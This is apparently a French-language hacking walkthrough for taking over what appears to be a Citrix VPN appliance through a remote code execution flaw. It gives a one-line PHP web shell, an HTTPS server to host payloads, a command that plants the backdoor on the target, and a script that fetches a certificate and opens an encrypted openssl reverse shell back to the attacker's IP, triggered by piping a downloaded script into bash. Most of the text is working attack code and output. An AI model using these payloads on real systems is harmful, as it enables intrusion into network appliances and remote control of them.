Création d’un Python HTTPS server
1
2
3
4
5
6
| from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 4443), SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./cert_serv.pem', server_side=True)
httpd.serve_forever()
|
Création du certificat TLS:
1
| openssl req -new -x509 -keyout cert_serv.pem -out cert_serv.pem -days 365 -nodes
|
Utilisation:
Code backdoor
Fichier “back.php”:
1
| <?php system(base64_decode($_POST['x'])); ?>
|
Test de la backdoor:
1
2
3
4
5
6
7
8
9
10
| (host) -> docker run -v ${PWD}:/opt/src --rm -ti php:alpine /bin/ash
(docker) -> # ip a s eth0
23: eth0@if24: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.4/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
(docker) -> # cd opt/src
/opt/src # php -S 0.0.0.0:1337
[Fri Feb 21 11:37:57 2020] PHP 7.4.2 Development Server (http://0.0.0.0:1337) started
|
Envoi de la commande curl:
1
2
3
| (host) -> curl -k http://172.17.0.4:1337/back.php -d "x=`echo 'id' | base64`"
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
|
Exploitation de la RCE et upload de la backdoor
Lancer le serveur python https:
Avec le tool de mpgn:
1
2
3
4
| (host) -> command > curl -k https://192.168.55.1:4443/back.php -o /var/vpn/themes/back.php
[+] Adding bookmark 7QDFBBVO4SZ9.xml
[+] Bookmark added
[+] Result of the command:
|
Trigger de la backdoor:
1
2
3
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'id' | base64)"
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
|
Reverse shell openssl
Check si openssl est installé:
1
2
3
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'which openssl' | base64)"
/usr/bin/openssl
|
Génération d’une paire de clé pour le rev shell:
1
| openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout priv.key -out cert.crt
|
Copie du certificat dans le dossier du serveur https:
1
| cp cert.crt PATH/TO/https
|
Ouverture de la socket openssl:
1
| openssl s_server -quiet -key priv.key -cert ../https/cert.crt -port 8443
|
Script pour trig le reverse shell openssl
1
2
3
4
5
6
7
8
9
| #!/bin/sh
IP_ATTACKER="192.168.55.1"
REMOTE_CRT_PATH="/var/vpn/themes/cert.crt"
OPENSSL_PATH=$(which openssl)
curl -k https://${IP_ATTACKER}:4443/cert.crt -o ${REMOTE_CRT_PATH}
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ${OPENSSL_PATH} s_client -quiet -CAfile ${REMOTE_CRT_PATH} -verify_return_error -verify 1 -connect ${IP_ATTACKER}:8443 > /tmp/s; rm /tmp/s
|
Trigger du rev shell TLS:
1
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'curl -k https://192.168.55.1:4443/revopenssl.sh | bash' | base64)"
|
Dans le terminal avec le openssl en attente:
1
2
3
4
| (host) -> openssl s_server -quiet -key priv.key -cert ../https/cert.crt -port 8443
sh: can't access tty; job control turned off
(citrix) -> $ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
|